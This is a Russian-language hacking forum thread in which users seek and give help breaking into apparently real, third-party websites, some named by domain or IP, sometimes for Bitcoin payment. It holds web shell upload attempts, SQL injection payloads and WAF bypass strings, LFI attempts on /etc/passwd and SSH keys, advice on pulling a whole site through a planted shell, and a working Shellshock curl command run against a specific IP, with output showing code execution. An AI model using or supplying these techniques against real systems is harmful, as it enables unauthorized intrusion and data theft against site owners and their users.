автор некий HoLyVieR, у него 4 место в рейтинге на рингзеротим..

я пока забил.. прохожу другие кейсы

Hi.Заливаю Shell,но тут трабла копирую url .

site.ru/usffoto/60/20170123104851wso2.php

захожу и всё равно выдаёт 404 ошибка

Пробовал так :

site.ru/usffoto/60/20170123104851wso2.php

site.ru/usffoto/60/20170123104851wso2.php.jpg

site.ru/usffoto/60/20170123104851wso2.jpg.php

site.ru/usffoto/60/20170123104851wso2

site.ru/usffoto/60/20170123104851wso

site.ru/usffoto/60/20170123104851

site.ru/usffoto/60/20170123104851.php .

SaNDER said:
↑ (https://antichat.live/posts/4039368/)
Hi.Заливаю Shell,но тут трабла копирую url .
site.ru/usffoto/60/20170123104851wso2.php
захожу и всё равно выдаёт 404 ошибка


phtml?php3?php5?shtml? или произвольное расширение?

Gorev said:
↑ (https://antichat.live/posts/4039369/)
phtml?php3?php5?shtml? или произвольное расширение?


Пробовал щас phtml . Забыл упомянуть,что при добавлении пишет ошибку : Warning: imagecreatefromjpeg() []: 'usffoto/20170123110107wso2.phtml' is not a valid JPEG file in /home/www/*****/***/addfoto.php on line 226

но также и добавляет фото :

Ваша фотография успешно добавлена

и в меню фоток этот шелл видно,но 404 . мб ты сайт увидел ?

SaNDER said:
↑ (https://antichat.live/posts/4039372/)
Пробовал щас phtml . Забыл упомянуть,что при добавлении пишет ошибку :
Warning
: imagecreatefromjpeg() []: 'usffoto/20170123110107wso2.phtml' is not a valid JPEG file in
/home/www/*****/***/addfoto.php
on line
226

но также и добавляет фото :

Ваша фотография успешно добавлена

и в меню фоток этот шелл видно,но 404 .


Скорее всего файл физически не льется на сервер, в списке он появляется, потому что скрипт загрузки и скрипт добавления в список не взаимодействуют друг с другом

скинь в пм , посмотрю

____://___.aratta-ukraine.com/text_ua.php?id=30559

Стоит WAF.Реально ли обойти?

Error-Based SQL Injection .

WAF фильтрует concat .

*****.**/news.php?id=1 concat

делаю выборку юзера из таблицы, получаю:


Code:
[14:42:33] [WARNING] the SQL query provided does not return any output
[14:42:33] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[14:42:33] [INFO] retrieved:
[14:42:35] [WARNING] the SQL query provided does not return any output

как быть?


Code:
./sqlmap.py -u https://site.ru --data="vuln=dd" -p vuln --cookie "cookie" --dbs --random-agent --sql-shell --threads 10 --no-cast

[QUOTE="SaNDER"]
SaNDER said:
↑ (https://antichat.live/posts/4040556/)
Error-Based SQL Injection .
WAF фильтрует concat .
*****.**/news.php?id=1 concat

Залить шелл в таких условиях?


Code:
$uploaddir = "img/news/";
$temp=sha1(uniqid()).".jpg";
$uploadfile = $uploaddir . $temp;
move_uploaded_file($_FILES['image']['tmp_name'], $uploadfile);

Octavian said:
↑ (https://antichat.live/posts/4041794/)
Залить шелл в таких условиях?


Только в фантазиях

есть урл, october cms - https://site.ru/blog/post/name_post

там есть скуля, хочу раскрутить через sqlmap, но чистого роута не знаю, есть спецы по octobercms?

нужно знать урл по типу такого https://site.ru/blog.php?post=name_post

и еще один вопрос, есть lfi:


Code:
Warning: file_exists() expects parameter 1 to be a valid path, string given in /var/www/***/***/***.php on line 3170 Не найден файл: site_func/https://raw.githubusercontent.com/tennc/webshell/master/php/wso/wso-4.2.5.php

судя из ошибка пыхи (а пыху знаю 6 лет), в file_exists нельзя пихать строку, требуется файл на сервере, как реализовать? Еще поправка, файлы онли .php подключает.

UPD:

Кстате любой файл исполняется, а не экранируется, конфиги не получить, cms знаю, пути знаю, как извлечь инфу нужную?

Кто поможет раскрутить lfi (url не дам, только варианты пробовать буду), отбрагодарю финансово.

В ЛС могу кинуть уязвимый код на пыхе

Где тут вектор атаки что я делаю нетак http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8 (http://iucosoft.com/software-development-details.html?place=-desktop%27+or+union+select+1,2,3+or+%27%27=%278)

XSS.

Задача обойти фильтр.

Пропускает исключительно

10$ в BTC за результативную помощь в внедрении кода (ЛС).

Сайт №1.

Отправляю:


Code:


Получаю:


Code:


Сайт №2

Отправляю:


Code:


Получаю


Code:

Elva said:
↑ (https://antichat.live/posts/4043729/)



Синтаксис нарушен img.src = 'https://domen.com/1.gif?', возможно из-за этого парсер ломает структуру. javascript:там не нужен.


Code:


Во втором похоже на белый список атриббутов, фильтр вроде caja.

Octavian said:
↑ (https://antichat.live/posts/4043288/)
Где тут вектор атаки что я делаю нетак
http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8 (http://iucosoft.com/software-development-details.html?place=-desktop%27+or+union+select+1,2,3+or+%27%27=%278)


Прочитай любую вводную стаью про SQL Injection.

Elva said:
↑ (https://antichat.live/posts/4043729/)
XSS.
Задача обойти фильтр.
Пропускает исключительно
10$ в BTC за результативную помощь в внедрении кода (ЛС).
Сайт №1.
Отправляю:

Code:


Получаю:

Code:


Сайт №2
Отправляю:

Code:


Получаю

Code:




1:


Code:


со вторым не факт, что получится, он вырезает лишние параметры из тега

Octavian said:
↑ (https://antichat.live/posts/4043922/)
я много прочитал и там не нахожу столбцы


Я там не вижу уязвимости.

Нашел инклюдовскую уяз.,почитал о ней,попытался залить шелл,но не получается.

Может кто-нибудь поможет?


Code:
Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74

Warning: include(mod/mtood"/index.php) [function.include]: failed to open stream: No such file or directory in /var/www/[site]/data/www/[site]/template/index.html on line 74

Warning: include() [function.include]: Failed opening 'mod/mtood"/index.php' for inclusion (include_path='.:/opt/php5.3-mod/lib/php') in /var/www/[site]/data/www/[site]/template/index.html on line 74

(Сайт могу скинуть в лс)

И еще вопрос,можно ли шелл не держать у себя на сайте?Залить его к примеру на файлообменник...

Octavian said:
↑ (https://antichat.live/posts/4043288/)
Где тут вектор атаки что я делаю нетак
http://iucosoft.com/software-development-details.html?place=-desktop'+or+union+select+1,2,3+or+''='8 (http://iucosoft.com/software-development-details.html?place=-desktop%27+or+union+select+1,2,3+or+%27%27=%278)


ты смешиваешь в одну кучу 2 разных вектора,ломая при этом весь синтаксис и логику


Code:
http://iucosoft.com/software-development-details.html?place=-desktop'+or+substring(version(),1,1)='5

таргет: https://site.ru/check.php?notif_read=-1' выводит на белом фоне - "sql exception" и все, как крутить можно?

foozzione said:
↑ (https://antichat.live/posts/4044931/)
таргет:
https://site.ru/check.php?notif_read=-1
' выводит на белом фоне - "sql exception" и все, как крутить можно?


Пробуй union-based, если не получится - Blind SQLi.

Ereee said:
↑ (https://antichat.live/posts/4044819/)
Я там не вижу уязвимости.


Там срабатывает ' or '5'='5 как нет

Ereee said:
↑ (https://antichat.live/posts/4044973/)
Пробуй union-based, если не получится - Blind SQLi.


пробовал такой техников в мапе, чекал почти полтора часа, в итоге ничего не вышло..

Octavian said:
↑ (https://antichat.live/posts/4045099/)
Там срабатывает ' or '5'='5 как нет


Да, ты прав, прозевал.


Octavian said:
↑ (https://antichat.live/posts/4045170/)
А где вывод?
Тут Boolean?


Да, boolean-based. Т.е. blind sql injection.

Сейчас попробую добиться вывода.

UPD: Очень странное поведение. НЕ удалость вывести у меня.

CSRF.

Стандартная форма изменения данных, отправляет PUT запрос, повторить который в том же Temper Data не удается - шлет POST.

POST - не принимается. GET - не срабатывет.

Есть возможность загрузить HTML файл на сервер.


Code:


В коде страницы и непосредственно в PUT запросе, никаких токенов нету, но в общем запросе он идет. Проверяется ли он? Не известно, т.к не знаю как повторить PUT запрос, но чувствую проверки токена нету.

http://meson.ad-l.ink/8dYPYPHym/image.png

Задача

Подделать PUT запрос с целью проведения CSRF атаки.

10$ в BTC за результативное решение (ЛС)

XSS.

Имеется множество хранимых xss на серверах с установленным http_only на сессии.

Очень хочется увидеть эти сайты глазами админа Рекомендовали попробовать BeEF, но с ним есть технические сложности (https://antichat.live/threads/447600/).

1. Что можете порекомендовать? Как можно эксплуатировать XSS, не зная интерфейса админки?

2. Кто может помочь включить BeEF ? (/threads/447600/ (https://antichat.live/threads/447600/)) 30$.

Octavian said:
↑ (https://antichat.live/posts/4045185/)
В скулмап ктото засунет . интересно что он скажет


слепая скуля, потому вывода нет.


Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(us er(),8,1)=%27t



Code:
http://iucosoft.com/software-development-details.html?place=desktop%27%20AND%20substring(ve rsion(),7,1)=%27-

user() = iucosoft

version() = 5.5.40-(дальше не докрутил) в ручную подбирал с телефона

Elva said:
↑ (https://antichat.live/posts/4045187/)
Задача
Подделать PUT запрос с целью проведения CSRF атаки.


Токен скорее всего проверяется, но всякое бывает. Для отправки PUT можно воспользоваться Burp-ом, для проведения атаки XMLHttpRequest.


Elva said:
↑ (https://antichat.live/posts/4045204/)
2. Кто может помочь включить BeEF ?


Попробуй подробно написать на гитхабе https://github.com/beefproject/beef/issues, возможно помогут.

Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?

Nikolaz said:
↑ (https://antichat.live/posts/4045629/)
Что можно сделать с локальной читалкой в гете при условии что конфиг к бд php формата и прочитать его соответственно не получается? Можно что то такое прочитать, что помогло бы получить доступ?


Может у тебя локальный инклуд?

crlf said:
↑ (https://antichat.live/posts/4045674/)
Может у тебя локальный инклуд?


У меня file_get_contents() а не include() . Читать ток могу

Nikolaz said:
↑ (https://antichat.live/posts/4045728/)
У меня file_get_contents() а не include() . Читать ток могу


тогда php файлы должны читаться, может прав не хватать, index.php например читается?

t0ma5 said:
↑ (https://antichat.live/posts/4045739/)
тогда php файлы должны читаться, может прав не хватать, index.php например читается?


Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду

Nikolaz said:
↑ (https://antichat.live/posts/4045754/)
Благодарю, не знал. Но прав не хватает... Нужны еще варианты помимо конфига от бд. Можно системное что нибудь прочитать что позволит получить доступ? Ссх клиент там, и прочую лабуду


ну для ssh пассы в открытом виде еще со времен мамонтов не было, попробуй файлы конфигов фтп, апача

Gorev said:
↑ (https://antichat.live/posts/4045763/)
ну для ssh пассы в открытом виде еще со времен мамонто не было, попробуй файлы конфигов фтп, апача


иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history

t0ma5 said:
↑ (https://antichat.live/posts/4045765/)
иногда случается... недавно видел один хост, на котором из под www-data читались /home/user/.ssh/id_rsa /home/user/.bash_history


ну это крайне редкое исключение из правил, обычно из под www не большой выбор

есть 2 blind (одна как мапер определил blind boolean):


Code:
[02:52:28] [INFO] GET parameter 'price' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

но я крутил ее полтора часа, в итоге - 0, какие еще способы есть? крутил с --risk 3 и --level 5

Вторая есть точно, она на странице выводит "sql exception" и на этом все, засунул в sqlmap, он нифига не нашел, но иньекция там есть 100%

Как крутить подскажите?

Добрый имеется шелл на сайте,

надо забрать весь сайт со всеми файлам (более 1 tb)

Упаковывать места нет (root'a тоже нет)

Может можно как то заблиндится к шеллу и использовать типа wget или еще нечто подобное что бы рекурсивно скачать на комп все файлы находящиеся в той или иной папке с сохранением структуры каталогов

Или может есть еще какие то варианты?

foozzione said:
↑ (https://antichat.live/posts/4046033/)
есть 2 blind (одна как мапер определил blind boolean):

Code:
[02:52:28] [INFO] GET parameter 'price' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable

но я крутил ее полтора часа, в итоге - 0, какие еще способы есть? крутил с --risk 3 и --level 5
Вторая есть точно, она на странице выводит "sql exception" и на этом все, засунул в sqlmap, он нифига не нашел, но иньекция там есть 100%
Как крутить подскажите?


Эксепшин, это скорее просто ошибка скрипта.

kacergei said:
↑ (https://antichat.live/posts/4046038/)
Добрый имеется шелл на сайте,
надо забрать весь сайт со всеми файлам (более 1 tb)
Упаковывать места нет (root'a тоже нет)
Может можно как то заблиндится к шеллу и использовать типа wget или еще нечто подобное что бы рекурсивно скачать на комп все файлы находящиеся в той или иной папке с сохранением структуры каталогов
Или может есть еще какие то варианты?


залей через шелл подключалку и биндь порт, через шелл качать долго и не скачает до конца, имхо только бинд как ты и написал, если конечно на серваке не лежит где нибудь готовый архив бэкап сайта.БД кстати тоже надо, только там попроще, через тот же шелл или админер

Gorev said:
↑ (https://antichat.live/posts/4046095/)
залей через шелл подключалку и биндь порт, через шелл качать долго и не скачает до конца, имхо только бинд как ты и написал, если конечно на серваке не лежит где нибудь готовый архив бэкап сайта.БД кстати тоже надо, только там попроще, через тот же шелл или админер


Это понятно, в том то и вопрос как заблиндившесь на порте рекурсивно слить все на комп?

kacergei said:
↑ (https://antichat.live/posts/4046300/)
Это понятно, в том то и вопрос как заблиндившесь на порте рекурсивно слить все на комп?


вообще по феншую на сервере поднимается rsync сервер с биндом порта, потом локальным rsync всё стягивается(абстракции там на уровне, вплоть до монтирования удаленной диры локально, если память не изменяет), точных команд не дам, надо ползти в маны

pw0ned said:
↑ (https://antichat.live/posts/4046040/)
Эксепшин, это скорее просто ошибка скрипта.


то есть крутить вообще никак?

foozzione said:
↑ (https://antichat.live/posts/4046312/)
то есть крутить вообще никак?


так прежде всего руками проверьте скуль, дело 5 минут, если руками крутиться надо искать причину почему скульмап не крутит(ваф или ещё что то)

foozzione said:
↑ (https://antichat.live/posts/4046312/)
то есть крутить вообще никак?


Выше человек сказал что делать, если не крутит - просто ошибка скрипта.

foozzione said:
↑ (https://antichat.live/posts/4046312/)
то есть крутить вообще никак?


https://rdot.org/forum/showthread.php?t=60

изучи все от и до

потом подумай, на какой хрен все это написали...

if (в голову ничего не придет){

new Петля->Мыло;

}

else echo $flag;

"]
[aywo] said:
↑ (https://antichat.live/posts/4046346/)
https://rdot.org/forum/showthread.php?t=60
изучи все от и до
потом подумай, на какой хрен все это написали...
if (в голову ничего не придет){
new Петля->Мыло;
}
else echo $flag;


я не понимаю зачем ты мне это предлагаешь, вопрос был поставлен четко, я уточнил есть ли возможность крутить при таком раскладе, ни один пейлоад не сработал, так что вопрос исчерпан!

foozzione said:
↑ (https://antichat.live/posts/4046350/)
я не понимаю зачем ты мне это предлагаешь, вопрос был поставлен четко, я уточнил есть ли возможность крутить при таком раскладе, ни один пейлоад не сработал, так что вопрос исчерпан!


пытается отучить от скрипткидинга)

t0ma5 said:
↑ (https://antichat.live/posts/4046353/)
пытается отучить от скрипткидинга)


в первую очередь руками чекал и так же чекал мапом, горело раскрутить, просто было уточнение, скорее это обычный эксепш пыховский...

foozzione said:
↑ (https://antichat.live/posts/4046354/)
в первую очередь руками чекал и так же чекал мапом, горело раскрутить, просто было уточнение, скорее это обычный эксепш пыховский...


постойте, руками чекалось наличие необработанного исключения(ошибки) или таки наличие вектора для атаки? [aywo] выразился грубо, но по сути хотел чтобы вы чекали наличие вектора, тогда вопросы были бы совсем другие и процесс был продуктивней

В каком фаиле на системе opencart хранятся записи о том какие фаилы можно загружать в папку download

уже написала в тему по Drupal, но мне кажется, её мало кто читает. Дублирую сюда, вопрос же

Всем привет

drupal 6.20. Аккаунт с правами администратора

Стандартные способы заливки шелла не помогают Кто что ещё подскажет?Что пробовала

1) В модулях включила PHP filter

2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.

А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом

3) Темы загружать не могу

4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается

Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.

5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.

В общем, не знаю, что ещё делать

Кто что подскажет?

Code:
http://www.biofuelstp.eu/

Помогите админку найти!

Что делать,если сайт фильтрует:From,select,union+select,table_ name,@@version ?

SaNDER said:
↑ (https://antichat.live/posts/4048879/)
Что делать,если сайт фильтрует:From,select,union+select,table_ name,@@version ?


/threads/425295/ (https://antichat.live/threads/425295/)

SaNDER said:
↑ (https://antichat.live/posts/4048879/)
Что делать,если сайт фильтрует:From,select,union+select,table_ name,@@version ?


Что конкретно тебе подойдет можно только гадать. Зависит от того, Чем и Как фильтруется. Копай в сторону обфускации SQL-запросов.

Вот небольшая подборка по теме:

https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt

DezMond™ said:
↑ (https://antichat.live/posts/4048634/)

Code:
http://www.biofuelstp.eu/

Помогите админку найти!




Code:
http://www.biofuelstp.eu/mapping/login.php
http://biofuelstp.eu/sqladmin
http://www.biofuelstp.eu/algaetaskforce/atf_home.html

Доброго времени суток.

Не подскажите как пробросить version() через WAF sweb.

https://rdot.org/forum/showthread.php?t=60 - все выше перечисленные способы фильтрует.

"]
[aywo] said:
↑ (https://antichat.live/posts/4048898/)
Что конкретно тебе подойдет можно только гадать. Зависит от того, Чем и Как фильтруется. Копай в сторону обфускации SQL-запросов.
Вот небольшая подборка по теме:
https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt


Стандартная ошибка :

.SpoilerTarget" type="button">Spoiler
Not Acceptable

An appropriate representation of the requested resource .......... could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.17 mod_perl/2.0.6 Perl/v5.10.1 Server at www (http://www).............. Port 80
mod_security by pass .

SaNDER said:
↑ (https://antichat.live/posts/4049161/)
Стандартная ошибка :
mod_security by pass .


попробуй что-то из следующего:

https://rdot.org/forum/showthread.php?t=3481

либо


Code:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

id=1+uni%0bon+se%0blect+1,2,3--

id=1+UNunionION+SEselectLECT+1,2,3--

id=1+UnIoN/**/SeLecT/**/1,2,3--

id=1+un/**/ion+se/**/lect+1,2,3--

id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0 D%0A1%2C2%2Ccurrent_user

?/%2A%2A/union/%2A%2A/select…

1/*!UnIoN*/SeLecT+1,2,3--

id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

"]
[aywo] said:
↑ (https://antichat.live/posts/4049166/)
попробуй что-то из следующего:
https://rdot.org/forum/showthread.php?t=3481
либо

Code:
id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

id=1+uni%0bon+se%0blect+1,2,3--

id=1+UNunionION+SEselectLECT+1,2,3--

id=1+UnIoN/**/SeLecT/**/1,2,3--

id=1+un/**/ion+se/**/lect+1,2,3--

id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0 D%0A1%2C2%2Ccurrent_user

?/%2A%2A/union/%2A%2A/select…

1/*!UnIoN*/SeLecT+1,2,3--

id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables
/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--



С обходом пробовал всё это . Токо как бы запросы не составлял постоянно типичная ошибка : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

qqq1457 said:
↑ (https://antichat.live/posts/4049183/)
отправляю сюда 79.171.115.8:8080//cgi-bin/wlogin методом get в Referer такое: () { Referer; }; echo -e "Content-Type: text/plain\n"; pwd
выполняется код,получаем Bash code injection vulnerability.вопрос: почему не выполняются команды: id,ls,uname ? и т д но
выполняются pwd и help?



акунетикс сильно логи засоряет, советую отказаться от активного пользования этим интсрументом вживую, и еще перехвати запросы акунетикса и посмотри что он отправляет на самом деле

qqq1457 said:
↑ (https://antichat.live/posts/4049208/)
а чем лучше отправлять post,get? да но на другом серве все норм исполняется


в лисе много плагинов которые прекрасно справляются с этими задачами, hackbar к примеру

qqq1457 said:
↑ (https://antichat.live/posts/4049218/)
я про отдельную прогу,ну да ладно,спасибо


проги обычно порождают паразитные запросы как и акунетикс

"]
[aywo] said:
↑ (https://antichat.live/posts/4049270/)
Потому, что данные команды недоступны для web-сервера из-под юзера, под которым работает web-сервер


доступны, просто есть нюанс

"]
[aywo] said:
↑ (https://antichat.live/posts/4049297/)
я, если честно, в диком ахуе, во что превратился ачат. Раньше тут не было столько школьников... хотя нынешних троллей даже школьниками не назвать. Помню Белого Жорика банили, за то, что гопника Kez'а троллил, как только мог. Но никто не поспорит,, что Жорик был профи в XSS. Даже большенство современной гринки ему в подметки не сгодятся, он развлекался хеком, и действительно делал это с юмором. Красный дядька+++ думал, что он ферзь йптваюматьнахявсеяинтерне т, ну или пытался таким казаться. А вот Elect, Algol, ettee - реально крутые мужики.
А что здесь происходит сейчас? Script kiddie - это тру хакеры в современном мире


ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево

и тролей тут без меня хватает


Code:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)

t0ma5 said:
↑ (https://antichat.live/posts/4049314/)
ты написал самый вероятный случай, а я открыл консоль и разобрался, можно конечно злится и писать что вчера трава была зеленее, но выглядит это дешево
и тролей тут без меня хватает

Code:
~$ curl --proxy socks5://127.0.0.1:9150 '79.171.115.8:8080/cgi-bin/wlogin' -H 'Referer: () { Referer; }; echo -e "Content-Type: text/plain\n";echo $(/bin/id)'
uid=1777(meteo) gid=1778(meteo) groups=501(fdp),1778(meteo)



спасибо

"]
[aywo] said:
↑ (https://antichat.live/posts/4049452/)
молодец, что ты разобрался. Объясни мне, зачем это ты разобрался и в чем? В ПМ, не надо тему засорять. Раз ты такой крутой разбиратель, давай в CTF поучаствуем?


я участвую, когда время есть слушай я не виноват что у тебя день плохой

prestashop (версия хз, как проверить тоже хз)

обнаружил такое:

http://site.ru/modules/blocklayered...ered_id_feature_20=20_8&id_category_layered=2 (http://site.ru/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_8&id_category_layered=2)

в ответ белая страница с:


Code:
Table 'stiliagi_new.ps_layered_category' doesn't exist

SELECT * FROM ps_layered_category WHERE id_category = 2 ORDER BY position ASC

Понятно что таким образом можно узнать имя бд, но интересует вопрос, можно ли это считать как скулю?

foozzione said:
↑ (https://antichat.live/posts/4050105/)
prestashop (версия хз, как проверить тоже хз)
обнаружил такое:
http://site.ru/modules/blocklayered...ered_id_feature_20=20_8&id_category_layered=2 (http://site.ru/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_8&id_category_layered=2)
в ответ белая страница с:

Code:
Table 'stiliagi_new.ps_layered_category' doesn't exist

SELECT * FROM ps_layered_category WHERE id_category = 2 ORDER BY position ASC

Понятно что таким образом можно узнать имя бд, но интересует вопрос, можно ли это считать как скулю?


Что бы разобраться в вопросе, не плохо было бы посмотреть исходный код который отвечает за данную обработку, в данном случае, если погуглить, как пример:

inurl:modules/blocklayered/blocklayered-ajax.php

Мы можем увидеть исходники на гитхабе:

https://github.com/PrestaShop/PrestaShop-1.5/blob/master/modules/blocklayered/blocklayered-ajax.php


PHP:
include(dirname(__FILE__).'/../../config/config.inc.php');
include(dirname(__FILE__).'/../../init.php');
include(dirname(__FILE__).'/blocklayered.php');
Context::getContext()->controller->php_self='category';
$blockLayered= newBlockLayered();
echo$blockLayered->ajaxCall();[/B]


где по классу мы видим обработку класса в файле blocklayered.php

https://github.com/PrestaShop/Prest...748da7c/modules/blocklayered/blocklayered.php (https://github.com/PrestaShop/PrestaShop-1.5/blob/a90e97eba490fd1cee0e8078e5c5a060b748da7c/modules/blocklayered/blocklayered.php)


участок кода:


PHP:
public functionhookProductListAssign($params)
{
global$smarty;
if (!Configuration::getGlobalValu e('PS_LAYERED_INDEXED'))
return;
$categories_count=Db::getInstance()->getValue('
SELECT COUNT(*)
FROM '._DB_PREFIX_.'layer ed_category
WHERE id_category = '.( int)Tools::getValue('id_category',Tools::getValue( 'id_category_layered',Configuration::get('PS_HOME_ CATEGORY'))).'
AND id_shop = '.(int)Co ntext::getContext()->shop->id
);

.....

$id_shop= (int)Context::getContext()->shop->id;

.....

/* Get the filters for the current category� �*/
$filters=Db::getInstance(_PS_USE_SQL_SLAVE_)->executeS('
SELECT * FROM '._DB_PRE FIX_.'layered_category
WHERE id_category = '.( int)$id_parent.'
AND id_shop = ' .$id_shop.'
GROUP BY `type`, id_val ue ORDER BY position ASC'
);

отсюда мы видим, что данные достаточно фильтруются и принимают только INT параметр, следовательно тут скули нет!

Есть сайт на

OpenCart 1.4.9 (https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwib6dyDv5jSAhWI2CwKHaB9BuQQFggdMAA&url=https%3A%2F%2Fwww.exploit-db.com%2Fexploits%2F17108%2F&usg=AFQjCNH1JiZeZL3DPKXBTbynu9bhnCbtVw&bvm=bv.147448319,d.bGg)

есть LFI

index.php?route=../../../../../../../../../../../../../../../etc/passwd%00

как бы не переберал ../ мне все время вылезает ошибка

Warning: is_dir() expects parameter 1 to be a valid path, string given in /home/officeme/public_html/system/engine/action.php on line 16Warning: is_file() expects parameter 1 to be a valid path, string given in /home/officeme/public_html/system/engine/action.php on line 24

но не какой фаил не инклудится

в чем прикол

rudu2 said:
↑ (https://antichat.live/posts/4050478/)
в чем прикол


Отсечение части пути нуллбайтом работает только в старых версиях PHP.

crlf said:
↑ (https://antichat.live/posts/4050498/)
Отсечение части пути нуллбайтом работает только в старых версиях PHP.


тоесть обойти это нельзя никак?

_librusec*pro что то фильтруется у них всё, даже админку найти не мог.

rudu2 said:
↑ (https://antichat.live/posts/4050608/)
тоесть обойти это нельзя никак?


Никак. Посмотри вот это https://rdot.org/forum/showthread.php?t=2611 , возможно, под твою версию проканает.

Более подробно https://rdot.org/forum/showpost.php?p=6942&postcount=24